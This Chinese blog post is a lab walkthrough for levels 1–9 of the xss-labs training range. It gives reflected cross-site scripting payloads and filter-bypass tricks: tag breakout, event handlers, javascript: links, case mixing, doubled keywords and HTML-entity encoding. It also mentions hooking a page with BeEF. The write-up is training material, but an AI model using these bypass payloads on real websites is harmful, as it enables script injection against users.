xss-labs-master;1-9关;内含靶场;更好了解xss;

原创 已于 2022-08-22 21:28:36 修改 · 605 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#xss #java #jvm

于 2022-08-22 21:27:21 首次发布
本文详细记录了一位安全研究员在XSS实验室中逐关破解的过程,从简单的反射型XSS到复杂的编码绕过,涉及JavaScript注入、事件驱动、Unicode编码等多个方面,展现了XSS漏洞利用的各种策略和技术。

1、搭建好靶场;

xss-labs-master.zip - 蓝奏云文件大小:1.1 M|https://wwu.lanzoum.com/iRuBk0a0luhe

 

2、name应该就是传参;

3、在name传参栏传入简单的script,成功;

反射型xss成功;接下来可以考虑用beef连接;

<script>alert(1)</script>

 4、来到了第二关;

也是先传一下简单的script;

keyword=<scritp>alert(1)</script> 

 网页栏传的参数为文本输出;

失败了;

查看网页源代码;

这就完成了

"><scritp>alert(1)</script>

 5、第三关试一下

失败;

输入'><script>alert(1)</script>

发现<>被过滤掉;

 

 想办法绕过; 事件驱动,点击事件;

' onclick='alert(1)'

6、第四关;

 试一下:<script>alert(1)<script>

失败;

查看网页源代码;尝试双引号闭合;

  

7、第五关:


 

 "><a href=javascript:alert(1)>

8、第六关

 "><a href=javascript:alert(1)>

使用第五关语句发现多了"_"

 大写R    "><a hRef=javascript:alert(1)>

9、第七关;

 使用第六关语句:"><a hRef=javascript:alert(1)>

发现href 和script被丢掉,尝试双写和大小写混合;

 "><a hrhrefef=javascscriptript:alert(1)>

 10、第8关;unicode编码绕过;

尝试一下第七关语句:   "><a hrhrefef=javascscriptript:alert(1)>

查看源代码,多了"-"

 "><a hRef=javasCript:alert(1)>

语句没问题,拒绝访问,考虑编码;

 

JavaScript:alert(1)

&#74;&#97;&#118;&#97;&#83;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41; 

 11、第9关;

试一下:JavaScript:alert(1)

试一下:JavaScript:alert('http://') 

f发现"_"

还是编码:

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;//http://

小乘杭
关注
xss-labs-master靶场速通教学(1-13)
m0_69151365的博客
03-04 1748
这个靶场比较基础,主要就是一些简单的防御规则,我们可以使用大小写、双写、伪协议、编码都能解决。练好这个靶场之后可以去试试xss.haozi.me靶场,见见更多的类型。
(2024最新版)xss-labs-master总结(包含源代码审计和前置思路)
weixin_74074789的博客
11-25 1817
这里我也没明白具体该怎么做,所以这里我直接查看源码,可以看到有一个值是通过 str11 来传递的,然后最终在 t_ref 中起效,但是这里的 t_ref 不是直接通过 GET 获取的,而是通过 http_server 传递的,那么思路就清晰了,直接去把 payload 打入 http_server 的字段中就可以打出 xss。也就是说标签 script 标签被过滤,事件被过滤,那我们可以尝试一下其他标签且没有匹配到事件键字的,好笑的是并没有找到。后续会有其他靶场更新,师傅们可以注一手哦~!
xss-labs-master.rar
05-09
xss-labs-master靶机资源,有xss漏洞攻击专项练习,一共有二十,也是小白的看门砖吧!
xss-labs-master
qq_60905276的博客
12-26 1428
1. 没有限制,直接输入<script>alert(/xss/)</script> 2.
xss-labs-master 1-13 (附解题过程及思路)
weixin_47306547的博客
09-25 1663
XSS测试代码 <script script '" OOnn> 可测试过滤的内容,如大小写,特殊符号,特殊标n签等 第 1 代码:name=<script>alert(/xss/)</script> 第 2 代码:keyword= "><script>alert(/xss/)</script> 第 3 代码:keyword=' onmouseover='alert(...
xss-labs-master.zip(xss注入通游戏/靶场
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器...
xss-labs-master源码
07-06
"xss-labs-master"是一个专门设计的靶场,包含了20个级别的XSS练习,旨在帮助学习者深入理解和掌握XSS攻击的原理、类型以及防御策略。通过逐步解决这些精心设计的挑战,我们可以逐步提升对XSS攻击的理解,并提升安全...
xss-labs-master靶场1-10
weixin_73921499的博客
03-21 860
通过$_GET["name"]接收用户传来的name参数,嵌入到HTML页面中,并且没有进行过滤。多了个get的参数,可以尝试后面的type="hidden"入手,或者给type="text"对输出进行了过滤,但是对input标签中的value属性中没有进行过滤。可以在传递name参数时,传递含有js的代码,进行XSS攻击。点击搜索,当鼠标在输入框中点击时,触发事件,完成xss攻击。时,即其值为假(false),将触发if语句的执行。,以防止其被实际执行,这会影响到弹窗的显示。
XSS漏洞深入及xss-labs-master靶场(复现)
2201_75642447的博客
03-25 1321
xss全称(cross site scripting)跨站脚本攻击,是最常见的web应用程序安全漏洞之一,位于owasptop102013年度第三名xss是指攻击者在网页中嵌入客户端脚本,通常是javascrip编写的危险代码,当用户使用浏览网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的。xss属于客户端攻击,受害者最终是用户,但特别要注意的是网站管理人员也属于用户之一。
xss-labs-master靶场详解!-----持续更新
muyuchen110的博客
08-02 1071
【代码】【xss-labs-master靶场详解!-----持续更新(目前1-10)。
xssed-master.zip
03-17
xssed靶场,对xss漏洞全面练习,适合新手练习xss,web安全,渗透,漏洞基础,典型漏洞,漏洞原理刨析,搭建在自己虚拟键,带源码,多分析 ,仅供学习,不得用于非法,否则与本人无
xss-labs-master心得
Ays.Ie的博客
11-03 2066
xss-labs-master心得
xss靶场实战(xss-labs-master靶场)
liushaojiax的博客
02-25 1511
,使用链接标签中的javascript:伪协议来执行 JS 代码,点击插入的链接便会弹窗。修改 url 地址中的name=<script>alert(1)
xss-labs-master题解
m0_52432374的博客
04-02 387
xss-labs-master题解 level 1 由图红线部分可知:这里是将name参数的值直接插入到了<h2></h2>标签之中,故这一主要就是考察反射型XSS。 直接get方式构造url: ?name=<script>alert('xss')</script> level 2 直接试一试 ?name=<script>alert('xss')</script> 发现不可以,查看源代码:看到在<h2></h2&
xss-labs-master靶场
K_kiii的博客
03-09 544
level1 发现有一个name参数,值为test;对name进行payload注入 name=<script>alert('hack')</script> 说明源码是完全没有对get请求道德name变量进行过滤,所以会被执行。 level2 1.test是以get请求发送的变量,2.在页面上发现了用户发送的变量 查看源码 发现我们输入的内容是一个文本框的value值,这样浏览器是不会执行我们的注入语句的,所以我们要构造标签闭合 构造闭合标签,把inp
浅谈XSS简单漏洞xss-labs-master(初级)
m0_68976043的博客
02-28 1765
网上很多gethub自己下就行XSS简介:当用户访问被XSS注入的网页,XSS代码就会被提取出来。用户浏览器就会解析这段XSS代码,也就是说用户被攻击了。用户最简单的动作就是使用浏览器上网,并且浏览器中有Javascript解释器,可以解析JavaScript,然而由于浏览器不具有人格,不会判断代码是否恶意,只要代码符合语法规则,浏览器就会解析这段XSS代码。简单来说,XSS就是通过攻击者精心构造的JS代码注入到网页中,并由浏览器解释运行这段JS代码,以达到恶意攻击浏览器的效果。
xss-lab-master心得
小学生的博客
03-27 1049
Xss-lab过心得
网安学习日志 XSS靶机训练(xss-labs-master)(1-10)
qq_41819426的博客
01-19 5217
1.第一 页面中我们并没有看到输入框,但是我们看到url中可以进行name值的修改。 看起来应该没有任何的过滤,我们直接输入语句尝试: <script>alert(1)</script> 这里还可以用很多方法,以下列举一些常用的方法: <input type=“text” onmouseover=alert(1)> <a href="javascript:alert(1)">a</a> <a onmouseover=“javasc
xss-labs-master 靶场怎么一个个进行传值请求尝试
最新发布
10-14
虽然给定的引用内容未直接提及 xss - labs - master 靶场逐个传值请求尝试的方法,但可以基于常见的安全测试思路和引用中类似打靶的情况进行分析。 对于 XSS 漏洞打靶(如引用[2]中提及的 XSS 打靶),可以使用自动...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值